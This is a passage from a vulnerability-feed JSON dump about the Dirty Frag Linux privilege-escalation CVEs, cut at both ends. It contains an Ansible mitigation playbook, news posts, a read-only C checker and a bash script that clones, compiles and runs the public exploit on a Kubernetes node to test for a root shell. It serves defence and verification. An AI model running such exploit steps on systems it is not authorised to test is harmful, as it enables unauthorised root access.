dirtyfrag_unload.changed\n\n - name: Check whether Dirty Frag modules are still loaded\n ansible.builtin.shell: \"grep -E '^(esp4|esp6|rxrpc) ' /proc/modules\"\n register: dirtyfrag_loaded\n changed_when: false\n failed_when: false\n\n - name: Verify modprobe resolves modules to /bin/false\n ansible.builtin.command: \"modprobe -n -v {{ item }}\"\n loop: \"{{ dirtyfrag_modules }}\"\n register: dirtyfrag_modprobe_check\n changed_when: false\n failed_when: false\n\n - name: Show mitigation status\n ansible.builtin.debug:\n msg:\n - \"config_changed={{ dirtyfrag_blacklist.changed }}\"\n - \"loaded_modules={{ dirtyfrag_loaded.stdout | default('') }}\"\n - \"modprobe_checks={{ dirtyfrag_modprobe_check.results | map(attribute='stdout') | list }}\"\n\n - name: Fail if Dirty Frag modules are still loaded\n ansible.builtin.fail:\n msg: \"One or more Dirty Frag modules are still loaded. Reboot this host or inspect module users.\"\n when: dirtyfrag_loaded.rc == 0\n```\n\nExample `inventory.yml`:\n\n```yaml\n---\nall:\n children:\n webservers:\n hosts:\n web-1:\n ansible_host: 203.0.113.10\n ansible_user: ubuntu\n web-2:\n ansible_host: 203.0.113.11\n ansible_user: ubuntu\n workers:\n hosts:\n worker-1:\n ansible_host: 203.0.113.20\n ansible_user: debian\n vars:\n ansible_become: true\n ansible_python_interpreter: /usr/bin/python3\n```\n\nRun it:\n\n```bash\nansible-playbook -i inventory.yml dirtyfrag-mitigate.yml\n```\n\nRun only a selected group:\n\n```bash\nansible-playbook -i inventory.yml dirtyfrag-mitigate.yml --limit webservers\n```\n\n## Ansible role-style task\n\nIf you already have a common hardening role, put the modules in group vars:\n\n```yaml\ndisabled_kernel_modules:\n - esp4\n - esp6\n - rxrpc\n```\n\nThen use this task block:\n\n```yaml\n- name: Block disabled kernel modules from loading\n ansible.builtin.copy:\n dest: \"/etc/modprobe.d/disable-{{ item }}.conf\"\n owner: root\n group: root\n mode: \"0644\"\n content: |\n install {{ item }} /bin/false\n loop: \"{{ disabled_kernel_modules | default([]) }}\"\n register: disabled_kernel_module_blacklists\n\n- name: Unload disabled kernel modules if currently loaded\n community.general.modprobe:\n name: \"{{ item }}\"\n state: absent\n loop: \"{{ disabled_kernel_modules | default([]) }}\"\n register: disabled_kernel_module_unloads\n failed_when: false\n\n- name: Flush filesystem buffers before clearing page cache\n ansible.builtin.command: sync\n changed_when: false\n when: disabled_kernel_module_blacklists.changed or disabled_kernel_module_unloads.changed\n\n- name: Clear page cache after Dirty Frag mitigation changes\n ansible.builtin.command: sysctl -w vm.drop_caches=3\n changed_when: true\n when: disabled_kernel_module_blacklists.changed or disabled_kernel_module_unloads.changed\n```\n\n## Remove the manual mitigation later\n\nOnly do this after your running kernel is fixed and you have rebooted into it.\n\n```bash\nsudo rm /etc/modprobe.d/disable-dirtyfrag.conf\nsudo reboot\n```\n", "creation_timestamp": "2026-05-08T16:19:20.000000Z"}, {"uuid": "47fe1743-21e1-44f6-b5a0-8182e12ee011", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/threatintel.microsoft.com/post/3mleath2kmz2p", "content": "A newly disclosed Linux local privilege escalation vulnerability known as \u201cDirty Frag\u201d enables escalation from an unprivileged user to root through vulnerable kernel networking & memory-fragment handling components, including esp4, esp6 (CVE-2026-43284), and rxrpc (CVE-2026-43500). msft.it/6015v3WNc", "creation_timestamp": "2026-05-08T17:26:35.837613Z"}, {"uuid": "7f779aba-f9b8-47d8-b8c1-06b83223038d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/crustytldr.bsky.social/post/3mlfyh6uxkw22", "content": "\ud83d\udd12 Dirty Frag (CVE-2026-43284, CVE-2026-43500): Mitigation\n\nDirty Frag (CVE-2026-43284, CVE-2026-43500) is a newly disclosed Linux kernel local privilege escalation vulnerability affecting I...\n\nhttps://is.gd/AoNgC0 #CyberSecurity #InfoSec #CrustyTLDR", "creation_timestamp": "2026-05-09T10:01:53.740445Z"}, {"uuid": "fefa0699-f39b-416b-8fab-2858492db34f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/kzzalews/dc37275ebd58c0367245260abd1b5145", "content": "#!/usr/bin/env bash\n# =============================================================================\n# DirtyFrag & Copy Fail \u2014 Empirical Exploitability Test\n# Target: Any AKS cluster (Ubuntu 22.04, kernel 5.15.x-azure)\n# CVEs: CVE-2026-43284 (DirtyFrag xfrm-ESP)\n# CVE-2026-43500 (DirtyFrag RxRPC)\n# CVE-2026-31431 (Copy Fail / algif_aead)\n# Advisory: https://github.com/Azure/AKS/issues/5753\n# Author: Karol Zalewski / Aiko (Claude Sonnet 4.6) \u2014 2026-05-09\n#\n# USAGE:\n# Set AZ_RG, AZ_CLUSTER, KUBE_CONTEXT below to match your cluster,\n# then run: ./dirtyfrag-cve-test.sh 2>&1 | tee results.txt\n#\n# WARNING: This script compiles and executes a public exploit PoC\n# (V4bel/dirtyfrag). Run only in DEV/test environments, with\n# explicit team approval, and only if you are authorised to do so.\n# =============================================================================\n\nset -euo pipefail\n\n# --- config \u2014 EDIT THESE -----------------------------------------------------\nAZ_RG=\"example-rg\" # Azure resource group of the cluster\nAZ_CLUSTER=\"example-cluster\" # AKS cluster name\nKUBE_CONTEXT=\"example-cluster\" # kubectl context name\nNAMESPACE=\"default\"\nTEST_NODE_POOL=\"nodepool1\" # picks first schedulable node from this pool\nPOD_DIRTYFRAG=\"dirtyfrag-test\"\nPOD_COPYFAIL=\"copyfail-test\"\n# -----------------------------------------------------------------------------\n\nRED='\\033[0;31m'; YELLOW='\\033[1;33m'; GREEN='\\033[0;32m'; CYAN='\\033[0;36m'; NC='\\033[0m'\n\nlog() { echo -e \"${CYAN}[$(date +%H:%M:%S)]${NC} $*\"; }\nok() { echo -e \"${GREEN}[OK]${NC} $*\"; }\nwarn() { echo -e \"${YELLOW}[WARN]${NC} $*\"; }\nerr() { echo -e \"${RED}[ERROR]${NC} $*\"; }\n\nconfirm() {\n local msg=\"${1:-Continue?}\"\n echo \"\"\n read -r -p \"$(echo -e \"${YELLOW}>>> ${msg} [y/N] ${NC}\")\" ans\n [[ \"${ans}\" =~ ^[Yy]$ ]] || { warn \"Skipped by user.\"; return 1; }\n}\n\n# --- cleanup -----------------------------------------------------------------\nCLEANUP_DONE=0\ncleanup() {\n [[ ${CLEANUP_DONE} -eq 1 ]] && return\n CLEANUP_DONE=1\n echo \"\"\n warn \"=== CLEANUP ===\"\n kubectl --context \"${KUBE_CONTEXT}\" delete pod \"${POD_DIRTYFRAG}\" \"${POD_COPYFAIL}\" \\\n --force --ignore-not-found --namespace \"${NAMESPACE}\" 2>/dev/null || true\n ok \"Test pods removed.\"\n}\ntrap cleanup EXIT INT TERM\n\n# =============================================================================\n# STEP 0 \u2014 Fetch kubeconfig & switch context\n# =============================================================================\necho \"\"\necho -e \"${CYAN}========================================${NC}\"\necho -e \"${CYAN} DirtyFrag / Copy Fail \u2014 CVE Test ${NC}\"\necho -e \"${CYAN}========================================${NC}\"\necho \"\"\n\nlog \"Step 0: Fetching kubeconfig for ${AZ_CLUSTER} (RG: ${AZ_RG})\"\naz aks get-credentials \\\n --resource-group \"${AZ_RG}\" \\\n --name \"${AZ_CLUSTER}\" \\\n --overwrite-existing\nok \"Kubeconfig merged.\"\n\nkubectl config use-context \"${KUBE_CONTEXT}\"\nok \"Context set to: ${KUBE_CONTEXT}\"\n\n# --- sanity check ------------------------------------------------------------\nlog \"Verifying node state...\"\nkubectl --context \"${KUBE_CONTEXT}\" get nodes \\\n -o custom-columns=\"NAME:.metadata.name,STATUS:.status.conditions[-1].type,KERNEL:.status.nodeInfo.kernelVersion,SCHED:.spec.unschedulable\" \\\n 2>/dev/null || true\necho \"\"\n\n# Pick first schedulable node from the target pool\nTARGET_NODE=$(kubectl --context \"${KUBE_CONTEXT}\" get nodes \\\n --no-headers \\\n -o custom-columns=\"NAME:.metadata.name,SCHED:.spec.unschedulable\" \\\n 2>/dev/null \\\n | awk -v pool=\"${TEST_NODE_POOL}\" '$1 ~ pool && $2 == \"\" {print $1; exit}')\n\nif [[ -z \"${TARGET_NODE}\" ]]; then\n err \"No schedulable '${TEST_NODE_POOL}' node found. Check node status above and re-run.\"\n exit 1\nfi\nok \"Target node: ${TARGET_NODE}\"\n\n# =============================================================================\n# STEP 1 \u2014 DirtyFrag xfrm-ESP (CVE-2026-43284) \u2014 THE KEY QUESTION\n# =============================================================================\necho \"\"\necho -e \"${CYAN}--- Step 1: DirtyFrag xfrm-ESP (CVE-2026-43284) ---${NC}\"\nwarn \"This step compiles and runs the researcher PoC (V4bel/dirtyfrag).\"\nwarn \"Expected outcomes:\"\nwarn \" ROOT SHELL \u2192 kernel 5.15 IS vulnerable to xfrm-ESP; AKS advisory incorrect\"\nwarn \" EXPLOIT FAIL \u2192 kernel 5.15 is NOT vulnerable; AKS advisory correct\"\necho \"\"\n\nconfirm \"Run DirtyFrag xfrm-ESP test on ${TARGET_NODE}?\" || { warn \"Skipping Step 1.\"; goto_step2=1; }\n\nif [[ -z \"${goto_step2:-}\" ]]; then\n log \"Spawning compiler pod (gcc:13) on ${TARGET_NODE}...\"\n kubectl --context \"${KUBE_CONTEXT}\" run \"${POD_DIRTYFRAG}\" \\\n --image=gcc:13 \\\n --restart=Never \\\n --namespace \"${NAMESPACE}\" \\\n --overrides=\"$(printf '{\n \"spec\": {\n \"nodeSelector\": {\"kubernetes.io/hostname\": \"%s\"},\n \"tolerations\": [{\"operator\": \"Exists\"}]\n }\n }' \"${TARGET_NODE}\")\" \\\n -- sleep 1800\n\n log \"Waiting for pod to be Ready (up to 120s)...\"\n kubectl --context \"${KUBE_CONTEXT}\" wait pod/\"${POD_DIRTYFRAG}\" \\\n --for=condition=Ready --timeout=120s --namespace \"${NAMESPACE}\"\n ok \"Pod ready.\"\n\n KERNEL=$(kubectl --context \"${KUBE_CONTEXT}\" exec \"${POD_DIRTYFRAG}\" \\\n --namespace \"${NAMESPACE}\" -- uname -r 2>/dev/null)\n log \"Kernel on node: ${KERNEL}\"\n\n log \"Cloning and compiling DirtyFrag PoC inside pod...\"\n kubectl --context \"${KUBE_CONTEXT}\" exec \"${POD_DIRTYFRAG}\" \\\n --namespace \"${NAMESPACE}\" -- bash -c '\n git clone https://github.com/V4bel/dirtyfrag.git /tmp/dirtyfrag 2>&1\n cd /tmp/dirtyfrag\n gcc -O0 -Wall -o exp exp.c -lutil 2>&1\n echo \"[COMPILE OK] binary: /tmp/dirtyfrag/exp\"\n '\n\n echo \"\"\n warn \"About to execute the exploit as UID 65534 (nobody) inside the pod.\"\n warn \"Watch for: root shell, uid=0, or /etc/passwd modification.\"\n warn \"If you get a root prompt inside the pod, type 'exit' to return.\"\n confirm \"Execute ./exp inside pod?\" || { warn \"Exploit execution skipped.\"; }\n\n echo \"\"\n echo -e \"${RED}=== EXPLOIT OUTPUT START ===${NC}\"\n kubectl --context \"${KUBE_CONTEXT}\" exec -it \"${POD_DIRTYFRAG}\" \\\n --namespace \"${NAMESPACE}\" -- \\\n bash -c 'cd /tmp/dirtyfrag && su -s /bin/bash nobody -c \"./exp\" 2>&1 || ./exp' \\\n || true\n echo -e \"${RED}=== EXPLOIT OUTPUT END ===${NC}\"\n echo \"\"\n\n log \"Step 1 cleanup: clearing page cache and unloading modules on node...\"\n kubectl --context \"${KUBE_CONTEXT}\" exec \"${POD_DIRTYFRAG}\" \\\n --namespace \"${NAMESPACE}\" -- \\\n bash -c 'echo 3 > /proc/sys/vm/drop_caches 2>/dev/null; rmmod esp4 esp6 rxrpc 2>/dev/null; echo \"cleanup done\"' \\\n || warn \"Page cache flush may require privileged access \u2014 check node manually if exploit succeeded.\"\n\n kubectl --context \"${KUBE_CONTEXT}\" delete pod \"${POD_DIRTYFRAG}\" \\\n --force --ignore-not-found --namespace \"${NAMESPACE}\" 2>/dev/null || true\n ok \"Step 1 pod removed.\"\nfi\n\n# =============================================================================\n# STEP 2 \u2014 DirtyFrag RxRPC (CVE-2026-43500) \u2014 expected FAIL on 5.15\n# =============================================================================\necho \"\"\necho -e \"${CYAN}--- Step 2: DirtyFrag RxRPC (CVE-2026-43500) ---${NC}\"\nwarn \"Expected: FAIL. Both AKS advisory and researcher agree RxRPC requires kernel >= 6.4.\"\nwarn \"This step confirms that kernel 5.15 is out-of-range for the RxRPC chain.\"\necho \"\"\n\nconfirm \"Run DirtyFrag RxRPC test (expected fail)?\" || { warn \"Skipping Step 2.\"; }\n\nif [[ \"${BASH_REMATCH[0]}\" != \"\" ]] || true; then\n log \"Re-using same pod setup for Step 2...\"\n kubectl --context \"${KUBE_CONTEXT}\" run \"${POD_DIRTYFRAG}\" \\\n --image=gcc:13 \\\n --restart=Never \\\n --namespace \"${NAMESPACE}\" \\\n --overrides=\"$(printf '{\n \"spec\": {\n \"nodeSelector\": {\"kubernetes.io/hostname\": \"%s\"},\n \"tolerations\": [{\"operator\": \"Exists\"}]\n }\n }' \"${TARGET_NODE}\")\" \\\n -- sleep 600 2>/dev/null || true\n\n kubectl --context \"${KUBE_CONTEXT}\" wait pod/\"${POD_DIRTYFRAG}\" \\\n --for=condition=Ready --timeout=120s --namespace \"${NAMESPACE}\" 2>/dev/null || true\n\n log \"Checking if rxrpc module loads on 5.15...\"\n echo -e \"${RED}=== RXRPC MODULE CHECK ===${NC}\"\n kubectl --context \"${KUBE_CONTEXT}\" exec \"${POD_DIRTYFRAG}\" \\\n --namespace \"${NAMESPACE}\" -- \\\n bash -c '\n uname -r\n echo \"Attempting to load rxrpc...\"\n modprobe rxrpc 2>&1 || echo \"modprobe rxrpc: failed (expected on 5.15 if module not present)\"\n lsmod | grep rxrpc || echo \"rxrpc: not loaded\"\n ls /lib/modules/$(uname -r)/kernel/net/rxrpc/ 2>/dev/null || echo \"rxrpc module directory: not found (kernel too old)\"\n ' || true\n echo -e \"${RED}=== END ===${NC}\"\n\n kubectl --context \"${KUBE_CONTEXT}\" delete pod \"${POD_DIRTYFRAG}\" \\\n --force --ignore-not-found --namespace \"${NAMESPACE}\" 2>/dev/null || true\n ok \"Step 2 done.\"\nfi\n\n# =============================================================================\n# STEP 3 \u2014 Copy Fail baseline (CVE-2026-31431)\n# =============================================================================\necho \"\"\necho -e \"${CYAN}--- Step 3: Copy Fail baseline (CVE-2026-31431) ---${NC}\"\nwarn \"Non-root pod (UID 1000). Tests whether AF_ALG socket auto-loads algif_aead.\"\nwarn \"Expected to succeed on nodes WITHOUT an algif_aead blacklist.\"\necho \"\"\n\nconfirm \"Run Copy Fail baseline test?\" || { warn \"Skipping Step 3.\"; exit 0; }\n\nlog \"Spawning non-root pod (python:3.12-slim, UID 1000)...\"\nkubectl --context \"${KUBE_CONTEXT}\" run \"${POD_COPYFAIL}\" \\\n --image=python:3.12-slim \\\n --restart=Never \\\n --namespace \"${NAMESPACE}\" \\\n --overrides=\"$(printf '{\n \"spec\": {\n \"securityContext\": {\"runAsNonRoot\": true, \"runAsUser\": 1000, \"runAsGroup\": 1000},\n \"nodeSelector\": {\"kubernetes.io/hostname\": \"%s\"},\n \"tolerations\": [{\"operator\": \"Exists\"}]\n }\n }' \"${TARGET_NODE}\")\" \\\n -- sleep 600\n\nkubectl --context \"${KUBE_CONTEXT}\" wait pod/\"${POD_COPYFAIL}\" \\\n --for=condition=Ready --timeout=120s --namespace \"${NAMESPACE}\"\nok \"Pod ready.\"\n\necho \"\"\necho -e \"${RED}=== COPY FAIL \u2014 AF_ALG SOCKET TEST ===${NC}\"\nkubectl --context \"${KUBE_CONTEXT}\" exec \"${POD_COPYFAIL}\" \\\n --namespace \"${NAMESPACE}\" -- \\\n python3 -c \"\nimport socket, os\nprint('Running as UID:', os.getuid())\nprint('Kernel:', open('/proc/version').read().split()[2])\ntry:\n s = socket.socket(38, 5, 0) # AF_ALG, SOCK_SEQPACKET\n s.bind(('aead', 'authencesn(hmac(sha256),cbc(aes))'))\n print('RESULT: algif_aead auto-loaded via AF_ALG socket')\n print('VERDICT: Node IS vulnerable to Copy Fail (CVE-2026-31431)')\n s.close()\nexcept PermissionError as e:\n print('RESULT: AF_ALG bind blocked -', e)\n print('VERDICT: algif_aead blacklist active OR module unavailable')\nexcept OSError as e:\n print('RESULT: AF_ALG socket error -', e)\n print('VERDICT: Module not loadable (kernel too old or not present)')\n\" 2>&1 || true\necho -e \"${RED}=== END ===${NC}\"\n\nkubectl --context \"${KUBE_CONTEXT}\" delete pod \"${POD_COPYFAIL}\" \\\n --force --ignore-not-found --namespace \"${NAMESPACE}\" 2>/dev/null || true\nok \"Step 3 done.\"\n\n# =============================================================================\n# SUMMARY\n# =============================================================================\necho \"\"\necho -e \"${CYAN}========================================${NC}\"\necho -e \"${CYAN} Test complete. ${NC}\"\necho -e \"${CYAN}========================================${NC}\"\necho \"\"\necho \"Key things to note:\"\necho \" - Step 1: Did ./exp produce a root shell? (y/n + full output)\"\necho \" - Step 2: Was rxrpc.ko present on 5.15? (expected: no)\"\necho \" - Step 3: Did AF_ALG socket load algif_aead? (expected: yes on unmitigated node)\"\necho \" - Node: ${TARGET_NODE} / Context: ${KUBE_CONTEXT}\"\necho \"\"\n", "creation_timestamp": "2026-05-09T10:18:18.000000Z"}, {"uuid": "5d17ebe3-2ccb-4747-9c88-dab18b98c389", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43500", "type": "seen", "source": "https://infosec.exchange/users/decio/statuses/116544139092238924", "content": "Tour d'horizon #DirtyFrag du jour :\nBien \u00e9videmment Microsoft a saut\u00e9 sur l'occasion avec un article sur une vuln Linux ...because M love Linux\ud83d\udc47 https://www.microsoft.com/en-us/security/blog/2026/05/08/active-attack-dirty-frag-linux-vulnerability-expands-post-compromise-risk/\nL'incontournable FAQ Tenable pour ceux comme moi qui aiment lire les CVE comme un mode d'emploi IKEA\ud83d\udc47 https://www.tenable.com/blog/dirty-frag-cve-2026-43284-cve-2026-43500-frequently-asked-questions-linux-kernel-lpe\nRed Hat a mis \u00e0 jour sa page RHSB-2026-003 avec mitigations et v\u00e9rifs, en attendant le patch qui arrive \"bient\u00f4t\u2122\" \ud83d\udc47 https://access.redhat.com/security/vulnerabilities/RHSB-2026-003\nEt chez moi sur ma belle et ador\u00e9e Debian ? Les canaux security sont patch\u00e9s pour bullseye, bookworm et trixie. Bien jou\u00e9 !\ud83d\udc47 https://security-tracker.debian.org/tracker/CVE-2026-43284\nCela dit, effectivement avec l'IA qui acc\u00e9l\u00e8re la d\u00e9couverte + embargos qui tiennent plus = fen\u00eatre d'exposition qui va pas aller en r\u00e9tr\u00e9cissant. Les mainteneurs vont devoir trouver de nouveaux tricks. Live-patch, micro-patch, pipelines acc\u00e9l\u00e9r\u00e9s... \u00e0 suivre.\n#CyberVeille", "creation_timestamp": "2026-05-09T10:27:16.984765Z"}, {"uuid": "37033961-9148-48bf-9a5e-f9784855ca2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/ostechnix.bsky.social/post/3mlg7ub7k7s2m", "content": "Fedora pushed kernel 7.0.4 to stable to fix the Dirty Frag and Copy Fail 2 vulnerabilities. Both CVE-2026-43284 and CVE-2026-43500 Patched.\n\nFull details here: ostechnix.com/fedora-44-ke... \n\n#Fedora44 #Linuxkernel704 #DirtyFrag #CopyFail2 #CVE_2026_43284 #CVE_2026_43500", "creation_timestamp": "2026-05-09T12:14:33.797523Z"}, {"uuid": "64c35aa1-3b84-473f-b277-650f63b53dcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43500", "type": "seen", "source": "https://bsky.app/profile/lu1tr0n.bsky.social/post/3mlg7xouqjr2s", "content": "Dirty Frag (CVE-2026-43284 y CVE-2026-43500): xfrm-ESP y RxRPC, los page-cache write primitives detr\u00e1s del nuevo LPE de mayo\n\n\nhttps://elsolitario.org/2026/05/09/dirty-frag-cve-2026-43284-y-cve-2026-43500-xfrm-esp-y-rxrpc-los-page-cache-write/?utm_source=bluesky&utm_medium=social&utm_campaign=pro...", "creation_timestamp": "2026-05-09T12:16:24.512733Z"}, {"uuid": "d16a7935-1539-4fda-a269-8c887f637b67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43500", "type": "seen", "source": "https://bsky.app/profile/lu1tr0n.bsky.social/post/3mlg7yapvym27", "content": "Dirty Frag (CVE-2026-43284 y CVE-2026-43500): xfrm-ESP y RxRPC, los page-cache write primitives detr\u00e1s del nuevo LPE de mayo\n\n\nhttps://elsolitario.org/2026/05/09/dirty-frag-cve-2026-43284-y-cve-2026-43500-xfrm-esp-y-rxrpc-los-page-cache-write/?utm_source=bluesky&utm_medium=social&utm_campaign=pro...", "creation_timestamp": "2026-05-09T12:16:42.615965Z"}, {"uuid": "d881e0d8-a2ff-459b-99cf-074c72cb51cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43500", "type": "seen", "source": "https://bsky.app/profile/lu1tr0n.bsky.social/post/3mlg7yr5bje27", "content": "Dirty Frag (CVE-2026-43284 y CVE-2026-43500): xfrm-ESP y RxRPC, los page-cache write primitives detr\u00e1s del nuevo LPE de mayo\n\n\nhttps://elsolitario.org/2026/05/09/dirty-frag-cve-2026-43284-y-cve-2026-43500-xfrm-esp-y-rxrpc-los-page-cache-write/?utm_source=bluesky&utm_medium=social&utm_campaign=pro...", "creation_timestamp": "2026-05-09T12:16:59.411836Z"}, {"uuid": "3633fcc2-67cf-4e33-851c-e44a4fa6d84a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3mlgkaaqqmx2m", "content": "Linux Kernel\u306eLPE(Local Privilege Escalation)\u8106\u5f31\u6027(Dirty Frag: CVE-2026-43284, CVE-2026-43500) - SIOS SECURITY BLOG\nhttps://security.sios.jp/vulnerability/kernel-security-vulnerability-20260508/", "creation_timestamp": "2026-05-09T15:20:08.794996Z"}, {"uuid": "f95ee5af-f9fc-42cd-a2a5-6311720be878", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/GithubRedTeam/83525", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a dirty-frag-check\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a haydenjames\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 1 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-09 14:58:13\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nRead-only checker for CVE-2026-43284 / CVE-2026-43500 (Dirty Frag) Linux kernel local-root vulns\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-09T15:00:04.000000Z"}, {"uuid": "94c058ed-5994-41b2-895c-33c4a5b653f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/artem-panchenko/0fab615ba3e9a7b471b659bef4472281", "content": "// Dirty Frag CVE reachability + diagnostic check (C port of dirtyfrag_check.py).\n//\n// Determines whether this container can reach either of the two CVEs in the\n// Dirty Frag chain and reports which kernel/sandbox layer is blocking.\n// Read-only; no exploit primitive is run.\n//\n// CVEs covered:\n// CVE-2026-43500 - RxRPC Page-Cache Write\n// NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-43500\n// Write-up: https://github.com/V4bel/dirtyfrag\n//\n// CVE-2026-43284 - xfrm-ESP Page-Cache Write\n// NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-43284\n// Write-up: https://github.com/V4bel/dirtyfrag\n//\n// Build: gcc -O0 -Wall -o /tmp/dirtyfrag_check dirtyfrag_check.c\n// Run: /tmp/dirtyfrag_check\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#ifndef AF_RXRPC\n#define AF_RXRPC 33\n#endif\n#ifndef NETLINK_XFRM\n#define NETLINK_XFRM 6\n#endif\n#ifndef CLONE_NEWUSER\n#define CLONE_NEWUSER 0x10000000\n#endif\n#ifndef CLONE_NEWNET\n#define CLONE_NEWNET 0x40000000\n#endif\n#ifndef CLONE_NEWNS\n#define CLONE_NEWNS 0x00020000\n#endif\n#ifndef CLONE_NEWPID\n#define CLONE_NEWPID 0x20000000\n#endif\n\n// ---------- helpers ----------\n\n// Read a small file's contents into buf (NUL-terminated, trailing whitespace\n// stripped). Returns buf. On error, fills buf with \"\".\nstatic const char *cat(const char *path, char *buf, size_t buflen) {\n int fd = open(path, O_RDONLY);\n if (fd < 0) {\n snprintf(buf, buflen, \"\", strerror(errno));\n return buf;\n }\n ssize_t n = read(fd, buf, buflen - 1);\n close(fd);\n if (n < 0) {\n snprintf(buf, buflen, \"\", strerror(errno));\n return buf;\n }\n buf[n] = 0;\n while (n > 0 && (buf[n - 1] == '\\n' || buf[n - 1] == ' ' || buf[n - 1] == '\\t')) {\n buf[--n] = 0;\n }\n return buf;\n}\n\n// Pull a \"Name: value\" field out of /proc/self/status. Returns NULL if absent.\nstatic const char *proc_status_field(const char *name, char *out, size_t outlen) {\n FILE *fp = fopen(\"/proc/self/status\", \"r\");\n if (!fp) { out[0] = 0; return NULL; }\n char line[512];\n size_t namelen = strlen(name);\n while (fgets(line, sizeof(line), fp)) {\n if (strncmp(line, name, namelen) == 0 && line[namelen] == ':') {\n const char *v = line + namelen + 1;\n while (*v == ' ' || *v == '\\t') v++;\n size_t L = strlen(v);\n while (L && (v[L-1] == '\\n' || v[L-1] == ' ')) L--;\n if (L >= outlen) L = outlen - 1;\n memcpy(out, v, L);\n out[L] = 0;\n fclose(fp);\n return out;\n }\n }\n fclose(fp);\n out[0] = 0;\n return NULL;\n}\n\n// True if a kernel module is loaded on the node.\n// Checks /sys/module// first, then /proc/modules with exact-prefix match.\nstatic bool module_loaded(const char *name) {\n char path[256];\n snprintf(path, sizeof(path), \"/sys/module/%s\", name);\n struct stat st;\n if (stat(path, &st) == 0) return true;\n\n FILE *fp = fopen(\"/proc/modules\", \"r\");\n if (!fp) return false;\n char line[512];\n size_t namelen = strlen(name);\n bool found = false;\n while (fgets(line, sizeof(line), fp)) {\n if (strncmp(line, name, namelen) == 0 && line[namelen] == ' ') {\n found = true;\n break;\n }\n }\n fclose(fp);\n return found;\n}\n\n// Fork a child, attempt unshare(flags), report back to the parent.\n// Returns NULL on success, otherwise strerror() of the errno from unshare().\nstatic const char *try_unshare(int flags) {\n pid_t pid = fork();\n if (pid < 0) return strerror(errno);\n if (pid == 0) {\n int rc = unshare(flags);\n _exit(rc == 0 ? 0 : (errno & 0xff));\n }\n int st;\n if (waitpid(pid, &st, 0) < 0) return strerror(errno);\n if (!WIFEXITED(st)) return \"child died abnormally\";\n int code = WEXITSTATUS(st);\n return code == 0 ? NULL : strerror(code);\n}\n\nstatic void section(const char *title) {\n putchar('\\n');\n for (int i = 0; i < 72; i++) putchar('=');\n printf(\"\\n%s\\n\", title);\n for (int i = 0; i < 72; i++) putchar('=');\n putchar('\\n');\n}\n\n// Tiny convenience: returns \"true\" / \"false\" string for printing.\nstatic const char *tf(bool v) { return v ? \"true\" : \"false\"; }\n\n// ---------- CVE-2026-43500 RxRPC check ----------\n\ntypedef struct {\n const char *verdict; // \"EXPLOITABLE\" or \"NOT EXPLOITABLE\"\n const char *cve; // \"CVE-2026-43500 RxRPC\"\n char why[256]; // one-line reason\n} result_t;\n\nstatic result_t check_rxrpc(void) {\n section(\"CVE-2026-43500 - RxRPC Page-Cache Write\");\n puts(\" Family: Dirty Frag chain\");\n puts(\" NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-43500\");\n puts(\" Write-up: https://github.com/V4bel/dirtyfrag\");\n puts(\" Trigger: socket(AF_RXRPC, ...) - no caps, no namespace needed\");\n puts(\" Distinct: Reaches the bug WITHOUT requiring CAP_NET_ADMIN or a\");\n puts(\" user namespace - so seccomp+caps alone do not stop it.\");\n puts(\" Mitigation must be node-level (rxrpc.ko unload/blacklist).\");\n putchar('\\n');\n\n bool reachable = false;\n int s = socket(AF_RXRPC, SOCK_DGRAM, 